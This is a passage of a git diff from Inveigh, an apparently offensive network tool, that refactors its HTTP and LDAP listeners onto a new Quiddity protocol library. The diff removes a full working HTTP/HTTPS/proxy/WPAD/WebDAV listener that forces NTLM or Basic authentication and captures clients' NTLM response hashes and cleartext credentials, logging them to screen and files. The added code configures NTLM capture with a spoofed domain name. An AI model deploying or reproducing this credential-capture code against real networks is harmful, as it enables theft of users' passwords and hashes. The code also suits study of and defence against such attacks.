Inveigh/Protocols/Quiddity/Quiddity.sln create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Clients/SMBClient.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Clients/TCPClient.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Listeners/DHCPv6Listener.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Listeners/DNSListener.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Listeners/HTTPListener.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Listeners/LDAPListener.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Listeners/LLMNRListener.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Listeners/MDNSListener.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Listeners/NetBIOSNSListener.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Listeners/SMBListener.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Listeners/TCPListener.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Listeners/UDPListener.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DCERPC/SCMR/SCMRROpenSCManagerW.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Checker.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Message.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Packet.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option1.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option14.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option16.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option2.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option23.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option24.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option3.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option39.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option5.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option6.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option8.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/Values/DHCPv6DUIDLL.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/Values/DHCPv6DUIDLLT.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSChecker.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSHeader.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSPacket.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSQuestion.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSResource.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/RDATA/DNSRecordA.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/RDATA/DNSRecordAAAA.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/RDATA/DNSRecordSOA.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/RDATA/DNSRecordSRV.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/GSSAPI/GSSAPIInitSecContext.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/HTTP/HTTPRequest.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/HTTP/HTTPResponse.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/ICMPv6/ICMPv6RouterAdvertisement.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/ICMPv6/Options/ICMPv6DNSSearchList.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/ICMPv6/Options/ICMPv6RecursiveDNS.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/IP/IPHeader.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/LDAPMessage.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPBindRequest.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPBindResponse.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPPartialAttributeList.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchRequest.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchResDone.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchResEntry.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPResult.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSaslCredentials.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSupportedCapabilities.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSupportedSASLMechanisms.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRChecker.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRHeader.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRPacket.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRQuestion.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRResource.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSChecker.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSHeader.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSPacket.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSQuestion.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSResource.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMChallenge.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMHelper.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMNegotiate.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMResponse.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMAVPair.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv1Response.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv2ClientChallenge.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv2Response.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSChecker.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSHeader.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSPacket.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSQuestion.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSResource.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSSessionService.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/PacketReader.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/PacketWriter.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXRequest.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXResponse.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/SMBHeader.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/SMBHelper.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CloseRequest.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CloseResponse.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CreateRequest.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CreateResponse.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ErrorResponse.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2FlushRequest.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2FlushResponse.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2LogoffRequest.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2LogoffResponse.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2NegotiateResponse.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2NegotiatelRequest.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryRequest.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryResponse.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ReadRequest.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ReadResponse.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupRequest.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupResponse.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectRequest.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectResponse.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectRequest.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectResponse.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2WriteRequest.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2WriteResponse.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Header.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Helper.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Packet.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Structures/SMB2NegotiateContext.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SPNEGO/SPNEGONegTokenInit.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/SPNEGO/SPNEGONegTokenResp.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/TCP/TCPHeader.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Protocols/UDP/UDPHeader.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Quiddity.csproj create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Support/ASN1.cs create mode 100644 Inveigh/Protocols/Quiddity/Quiddity/Support/Utilities.cs create mode 100644 Inveigh/Protocols/Quiddity/README.md delete mode 100644 Inveigh/Protocols/Quiddity/Support/ASN1.cs delete mode 100644 Inveigh/Protocols/Quiddity/Support/Utilities.cs delete mode 100644 Inveigh/Protocols/README.md diff --git a/Inveigh/Listeners/HTTPListener.cs b/Inveigh/Listeners/HTTPListener.cs index e428a0f..d3b0961 100644 --- a/Inveigh/Listeners/HTTPListener.cs +++ b/Inveigh/Listeners/HTTPListener.cs @@ -1,432 +1,59 @@ -using Quiddity; -using Quiddity.HTTP; -using Quiddity.NTLM; -using System; -using System.Net; -using System.Net.Sockets; -using System.Text; -using System.Threading; -using System.Security.Cryptography.X509Certificates; -using System.Security.Authentication; -using System.Net.Security; -using Quiddity.Support; +using System; namespace Inveigh { - class HTTPListener + class HTTPListener : Quiddity.HTTPListener { - public const SslProtocols tls12 = (SslProtocols)0x00000C00; - internal void Start(IPAddress ipAddress, int port, string type) + public HTTPListener() { - TCPListener tcpListener = new TCPListener(ipAddress, port); - IAsyncResult tcpAsync; - - try - { - tcpListener.Start(); - - if (type.Equals("Proxy")) - { - tcpListener.Server.LingerState = new LingerOption(true, 0); - } - - } - catch (Exception ex) - { - - if (ex.Message.ToString().Equals("An attempt was made to access a socket in a way forbidden by its access permissions")) - { - Output.Queue(string.Format("[!] Failed to start {0} listener on port {1}, check IP and port usage.", type, port)); - } - else - { - Output.Queue(ex.ToString()); - - } - } - - while (Program.isRunning) - { - tcpAsync = tcpListener.BeginAcceptTcpClient(null, null); - - do - { - Thread.Sleep(10); + this.EnabledWebDAV = true; + this.IgnoreAgents = new string[] { "Firefox" }; + this.HTTPAuth = "NTLM"; + this.WebDAVAuth = "NTLM"; + this.WPADAuth = "NTLM"; + this.HTTPRealm = "ADFS"; + this.NetbiosDomain = "DESKTOP-TI86FV2"; + this.ComputerName = "DESKTOP-TI86FV2"; + this.DNSDomain = "DESKTOP-TI86FV2"; + } - if (!Program.isRunning) - { - break; - } + protected override void OutputUserAgent(string protocol, string listenerPort, string clientIP, string clientPort, string userAgent) + { + Output.Queue(String.Format("[.] [{0}] {1}({2}) user agent from {3}:{4}:{5}{6}", Output.Timestamp(), protocol, listenerPort, clientIP, clientPort, Environment.NewLine, userAgent)); + } - } - while (!tcpAsync.IsCompleted); + protected override void OutputHostHeader(string protocol, string listenerPort, string clientIP, string clientPort, string hostHeader) + { + Output.Queue(String.Format("[.] [{0}] {1}({2}) host header {3} from {4}:{5}", Output.Timestamp(), protocol, listenerPort, hostHeader, clientIP, clientPort)); + } - TcpClient tcpClient = tcpListener.EndAcceptTcpClient(tcpAsync); - object[] parameters = { tcpClient, type }; - ThreadPool.QueueUserWorkItem(new WaitCallback(ReceiveClient), parameters); - } + protected override void OutputRequestMethod(string protocol, string listenerPort, string clientIP, string clientPort, string uri, string method) + { + Output.Queue(String.Format("[.] [{0}] {1}({2}) {3} request from {5}:{6} for {4}", Output.Timestamp(), protocol, listenerPort, method, uri, clientIP, clientPort)); + } + protected override void OutputNTLM(string protocol, string listenerPort, string clientIP, string clientPort, string user, string domain, string host, string ntlmChallenge, string ntlmResponseHash, string lmResponseHash) + { + Output.NTLMOutput(user, domain, ntlmChallenge, ntlmResponseHash, clientIP, host, protocol, listenerPort, clientPort, lmResponseHash); } - internal void ReceiveClient(object parameters) + protected override void OutputChallenge(string protocol, string listenerPort, string clientIP, string clientPort, string challenge) { - object[] parameterArray = parameters as object[]; - TcpClient tcpClient = (TcpClient)parameterArray[0]; - string type = (string)parameterArray[1]; - string[] supportedMethods = { "GET", "HEAD", "OPTIONS", "CONNECT", "POST", "PROPFIND" }; - string sourceIP = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Address.ToString(); - string sourcePort = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Port.ToString(); - string listenerPort = ((IPEndPoint)(tcpClient.Client.LocalEndPoint)).Port.ToString(); - string session = sourceIP + ":" + sourcePort; - string ntlmChallenge = ""; - int ntlmStage = 0; - bool proxyIgnoreMatch = false; - bool wpadAuthIgnoreMatch = false; - NetworkStream tcpStream = null; - NetworkStream httpStream = null; - SslStream httpsStream = null; - X509Certificate2 certificate = null; - bool isClientClose = false; + Output.Queue(String.Format("[+] [{0}] {1}({2}) NTLM challenge [{3}] sent to {4}:{5}", Output.Timestamp(), protocol, listenerPort, challenge, clientIP, clientPort)); + } - if (type.Equals("HTTPS")) + protected override void OutputError(Exception ex, string protocol, int port) + { + if (ex.Message.ToString().Equals("An attempt was made to access a socket in a way forbidden by its access permissions")) { - byte[] certificateData = Convert.FromBase64String(Program.argCert); - certificate = new X509Certificate2(certificateData, Program.argCertPassword, X509KeyStorageFlags.MachineKeySet); - tcpStream = tcpClient.GetStream(); - httpsStream = new SslStream(tcpStream, false); + Output.Queue(string.Format("[!] Failed to start {0} listener on port {1}, check IP and port usage.", protocol, port)); } else { - httpStream = tcpClient.GetStream(); - } - - while (tcpClient.Connected && Program.isRunning) - { - byte[] requestData = new byte[4096]; - - if (type.Equals("HTTPS")) - { - - do - { - Thread.Sleep(100); - } - while (!tcpStream.DataAvailable && tcpClient.Connected); - - } - else - { - - do - { - Thread.Sleep(100); // todo check - } - while (!httpStream.DataAvailable && tcpClient.Connected); - - } - - if (String.Equals(type, "HTTPS")) - { - - try - { - - if (!httpsStream.IsAuthenticated) - { - httpsStream.AuthenticateAsServer(certificate, false, tls12, false); - } - - while (tcpStream.DataAvailable) - { - httpsStream.Read(requestData, 0, requestData.Length); - } - - } - catch (Exception ex) - { - - if (!ex.Message.Contains("A call to SSPI failed, see inner exception.")) - { - Console.WriteLine(ex.Message); - } - - } - - } - else - { - - while (httpStream.DataAvailable) - { - httpStream.Read(requestData, 0, requestData.Length); - } - - } - - HTTPRequest request = new HTTPRequest(); - - if (!Utilities.ArrayIsNullOrEmpty(requestData)) - { - request.ReadBytes(requestData, 0); - } - - if (!string.IsNullOrEmpty(request.Method)) - { - Output.Queue(String.Format("[.] [{0}] {1}({2}) {3} request from {5}:{6} for {4}", Output.Timestamp(), type, listenerPort, request.Method, request.URI, sourceIP, sourcePort)); - } - - if (!string.IsNullOrEmpty(request.URI)) - { - Output.Queue(String.Format("[.] [{0}] {1}({2}) host header {3} from {4}:{5}", Output.Timestamp(), type, listenerPort, request.Host, sourceIP, sourcePort)); - } - - if (!string.IsNullOrEmpty(request.UserAgent)) - { - Output.Queue(String.Format("[.] [{0}] {1}({2}) user agent from {3}:{4}:{5}{6}", Output.Timestamp(), type, listenerPort, sourceIP, sourcePort, Environment.NewLine, request.UserAgent)); - } - - if (!string.IsNullOrEmpty(request.Method) && Array.Exists(supportedMethods, element => element == request.Method)) - { - - HTTPResponse response = new HTTPResponse - { - Version = "HTTP/1.1", - StatusCode = "401", - ReasonPhrase = "Unauthorized", - Connection = "close", - Server = "Microsoft-HTTPAPI/2.0", - Date = DateTime.Now.ToString("R"), - ContentType = "text/html", - ContentLength = "0" - }; - - if (!Utilities.ArrayIsNullOrEmpty(Program.argIgnoreAgents) && Program.argWPADAuth.Equals("NTLM")) - { - - foreach (string agent in Program.argIgnoreAgents) - { - - if (request.UserAgent.ToUpper().Contains(agent.ToUpper())) - { - wpadAuthIgnoreMatch = true; - } - - } - - if (wpadAuthIgnoreMatch) - { - Output.Queue(string.Format("[-] [{0}] {1}({2}) switching wpad.dat auth to anonymous due to user agent match from {3}:{4}", Output.Timestamp(), type, listenerPort, sourceIP, sourcePort)); - } - - } - - if (type.Equals("Proxy")) - { - response.StatusCode = "407"; - response.ProxyAuthenticate = "NTLM"; - response.WWWAuthenticate = ""; - response.Connection = "close"; - } - else if(Program.enabledWebDAV && request.Method.Equals("PROPFIND") && Program.argWebDAVAuth.StartsWith("NTLM")) - { - response.WWWAuthenticate = "NTLM"; - } - else if (Program.enabledWebDAV && request.Method.Equals("PROPFIND") && Program.argWebDAVAuth.Equals("BASIC")) - { - response.WWWAuthenticate = string.Concat("Basic realm=", Program.argHTTPRealm); - } - else if (!string.Equals(request.URI, "/wpad.dat") && string.Equals(Program.argHTTPAuth, "ANONYMOUS") || string.Equals(request.URI, "/wpad.dat") && string.Equals(Program.argWPADAuth, "ANONYMOUS") || wpadAuthIgnoreMatch || - (Program.enabledWebDAV && request.Method.Equals("OPTIONS"))) - { - response.StatusCode = "200"; - response.ReasonPhrase = "OK"; - } - else if ((Program.argHTTPAuth.StartsWith("NTLM") && !string.Equals(request.URI, "/wpad.dat")) || (Program.argWPADAuth.StartsWith("NTLM") && string.Equals(request.URI, "/wpad.dat"))) - { - response.WWWAuthenticate = "NTLM"; - } - else if ((string.Equals(Program.argHTTPAuth, "BASIC") && !string.Equals(request.URI, "/wpad.dat")) || (string.Equals(Program.argWPADAuth, "BASIC") && string.Equals(request.URI, "/wpad.dat"))) - { - response.WWWAuthenticate = string.Concat("Basic realm=", Program.argHTTPRealm); - } - - if ((!string.IsNullOrEmpty(request.Authorization) && request.Authorization.ToUpper().StartsWith("NTLM ")) || (!string.IsNullOrEmpty(request.ProxyAuthorization)) && request.ProxyAuthorization.ToUpper().StartsWith("NTLM ")) - { - string authorization = request.Authorization; - - if (!string.IsNullOrEmpty(request.ProxyAuthorization)) - { - authorization = request.ProxyAuthorization; - } - - NTLMNegotiate ntlm = new NTLMNegotiate(); - ntlm.ReadBytes(Convert.FromBase64String(authorization.Substring(5, authorization.Length - 5)), 0); - - if (ntlm.MessageType == 1) - { - byte[] timestamp = BitConverter.GetBytes(DateTime.Now.ToFileTime()); - NTLMChallenge challenge = new NTLMChallenge(Program.argChallenge, Program.netbiosDomain, Program.computerName, Program.dnsDomain, Program.computerName, Program.dnsDomain); - byte[] challengeData = challenge.GetBytes(Program.computerName); - ntlmChallenge = BitConverter.ToString(challenge.ServerChallenge).Replace("-", ""); - string sessionTimestamp = BitConverter.ToString(timestamp).Replace("-", ""); - Program.httpSessionTable[sessionTimestamp] = ntlmChallenge; - Output.Queue(String.Format("[+] [{0}] {1}({2}) NTLM challenge [{3}] sent to {4}:{5}", Output.Timestamp(), type, listenerPort, ntlmChallenge, sourceIP, sourcePort)); - - if (String.Equals(type, "Proxy")) - { - response.StatusCode = "407"; - response.ProxyAuthenticate = "NTLM " + Convert.ToBase64String(challengeData); - } - else - { - response.WWWAuthenticate = "NTLM " + Convert.ToBase64String(challengeData); - } - - response.Connection = ""; - } - else if (ntlm.MessageType == 3) - { - response.StatusCode = "200"; - response.ReasonPhrase = "OK"; - ntlmStage = 3; - isClientClose = true; - NTLMResponse ntlmResponse = new NTLMResponse(Convert.FromBase64String(authorization.Substring(5, authorization.Length - 5)), false); - string domain = Encoding.Unicode.GetString(ntlmResponse.DomainName); - string user = Encoding.Unicode.GetString(ntlmResponse.UserName); - string host = Encoding.Unicode.GetString(ntlmResponse.Workstation); - string ntlmResponseHash = BitConverter.ToString(ntlmResponse.NtChallengeResponse).Replace("-", ""); - string lmResponseHash = BitConverter.ToString(ntlmResponse.LmChallengeResponse).Replace("-", ""); - - if (string.IsNullOrEmpty(ntlmChallenge)) // NTLMv2 workaround to track sessions over different ports without a cookie - { - byte[] timestamp = new byte[8]; - Buffer.BlockCopy(ntlmResponse.NtChallengeResponse, 24, timestamp, 0, 8); - string sessionTimestamp = BitConverter.ToString(timestamp).Replace("-", ""); - ntlmChallenge = Program.httpSessionTable[sessionTimestamp].ToString(); - } - - Output.NTLMOutput(user, domain, ntlmChallenge, ntlmResponseHash, sourceIP, host, type, listenerPort, sourcePort, lmResponseHash); - - if (type.Equals("Proxy")) - { - - if (!string.IsNullOrEmpty(Program.argHTTPResponse)) - { - response.CacheControl = "no-cache, no-store"; - } - - } - - } - - } - else if (!string.IsNullOrEmpty(request.Authorization) && request.Authorization.ToUpper().StartsWith("BASIC ")) - { - response.StatusCode = "200"; - response.ReasonPhrase = "OK"; - string httpHeaderAuthorizationBase64 = request.Authorization.Substring(6, request.Authorization.Length - 6); - string cleartextCredentials = Encoding.UTF8.GetString(Convert.FromBase64String(httpHeaderAuthorizationBase64)); - - lock (Program.cleartextList) - { - Program.cleartextList.Add(string.Concat(sourceIP, " ", cleartextCredentials)); - } - - Output.Queue(string.Format("[+] [{0}] {1}({2}) Basic authentication [cleartext credentials] captured from {3}({4}):\r\n{5}", Output.Timestamp(), type, listenerPort, sourceIP, sourcePort, cleartextCredentials)); - - if (Program.enabledFileOutput) - { - - lock (Program.cleartextFileList) - { - Program.cleartextFileList.Add(string.Concat(sourceIP, ",", cleartextCredentials)); - } - - Output.Queue(string.Format("[!] [{0}] {1}({2}) Basic authentication cleartext credentials written to {3}", Output.Timestamp(), type, listenerPort, String.Concat(Program.argFilePrefix, "-Cleartext.txt"))); - } - - } - - if (!string.IsNullOrEmpty(Program.argWPADResponse) && !proxyIgnoreMatch && string.Equals(request.URI, "/wpad.dat")) - { - response.ContentType = "application/x-ns-proxy-autoconfig"; - response.Message = Encoding.UTF8.GetBytes(Program.argWPADResponse); - } - else if (!string.IsNullOrEmpty(Program.argHTTPResponse)) - { - response.Message = Encoding.UTF8.GetBytes(Program.argHTTPResponse); - } - - if (Program.enabledWebDAV) - { - - if (request.Method.Equals("OPTIONS")) - { - response.StatusCode = "200"; - response.ReasonPhrase = "OK"; - response.Allow = "OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, LOCK, UNLOCK"; - response.Public = "OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK"; - response.DAV = "1,2,3"; - response.Author = "DAV"; - } - else if (request.Method.Equals("PROPFIND")) - { - DateTime currentTime = DateTime.Now; - response.Message = Encoding.UTF8.GetBytes("\r\nNot Authorized\r\n\r\n

Not Authorized

\r\n

HTTP Error 401. The requested resource requires user authentication.

\r\n\r\n"); - response.Connection = ""; - - if (ntlmStage == 3 || (!string.IsNullOrEmpty(request.Authorization) && request.Authorization.ToUpper().StartsWith("BASIC ")) || Program.argHTTPAuth.Equals("ANONYMOUS")) - { - response.Connection = "close"; - - if (!request.URI.Contains(".")) - { - response.ContentType = "text/xml"; - response.Message = Encoding.UTF8.GetBytes("http://" + sourceIP + request.URI + "HTTP/1.1 200 OK" + currentTime.ToString("R") + "0webdav01" + currentTime.ToString("yyyy-MM-ddThh:mm:ss.fffZ") + ""); - } - else - { - response.ContentType = "text/plain"; - } - - } - - } - - } - - byte[] buffer = response.GetBytes(); - - if (type.Equals("HTTPS") && httpsStream.CanRead) - { - httpsStream.Write(buffer, 0, buffer.Length); - httpsStream.Flush(); - } - else if (httpStream.CanRead) - { - httpStream.Write(buffer, 0, buffer.Length); - httpStream.Flush(); - } - - if (isClientClose) - { - - if (type.Equals("Proxy")) - { - tcpClient.Client.Close(); - } - else - { - tcpClient.Close(); - } - - } - - } + Output.Queue(ex.ToString()); } - } } diff --git a/Inveigh/Listeners/LDAPListener.cs b/Inveigh/Listeners/LDAPListener.cs index 19bed7d..48e73df 100644 --- a/Inveigh/Listeners/LDAPListener.cs +++ b/Inveigh/Listeners/LDAPListener.cs @@ -1,159 +1,30 @@ -using Quiddity; -using Quiddity.LDAP; -using Quiddity.NTLM; -using Quiddity.Support; -using System; -using System.Net; -using System.Net.Sockets; -using System.Text; -using System.Threading; +using System; namespace Inveigh { - class LDAPListener + class LDAPListener : Quiddity.LDAPListener { - internal void Start(IPAddress ipAddress, int port) + protected override void OutputChallenge(string listenerPort, string clientIP, string clientPort, string challenge) { - TCPListener tcpListener = new TCPListener(ipAddress, port); - IAsyncResult tcpAsync; - TcpClient tcpClient; - - try - { - tcpListener.Start(); - } - catch (Exception ex) - { - - if (ex.Message.ToString().Equals("An attempt was made to access a socket in a way forbidden by its access permissions")) - { - Output.Queue(String.Format("[!] Failed to start LDAP listener on port {0}, check IP and port usage.", port)); - } - else - { - Output.Queue(ex.ToString()); - - } - } - - while (Program.isRunning) - { - tcpAsync = tcpListener.BeginAcceptTcpClient(null, null); - - do - { - Thread.Sleep(10); - - if (!Program.isRunning) - { - break; - } - - } - while (!tcpAsync.IsCompleted); - - tcpClient = tcpListener.EndAcceptTcpClient(tcpAsync); - object[] parameters = { tcpClient }; - ThreadPool.QueueUserWorkItem(new WaitCallback(ReceiveClient), parameters); - } + Output.Queue(String.Format("[+] [{0}] LDAP({1}) NTLM challenge [{2}] sent to {3}:{4}", Output.Timestamp(), listenerPort, challenge, clientIP, clientPort)); + } + protected override void OutputNTLM(string protocol, string listenerPort, string clientIP, string clientPort, string user, string domain, string host, string ntlmChallenge, string ntlmResponseHash, string lmResponseHash) + { + Output.NTLMOutput(user, domain, ntlmChallenge, ntlmResponseHash, clientIP, host, protocol, listenerPort, clientPort, lmResponseHash); } - internal void ReceiveClient(object parameters) + protected override void OutputError(Exception ex, int port) { - object[] 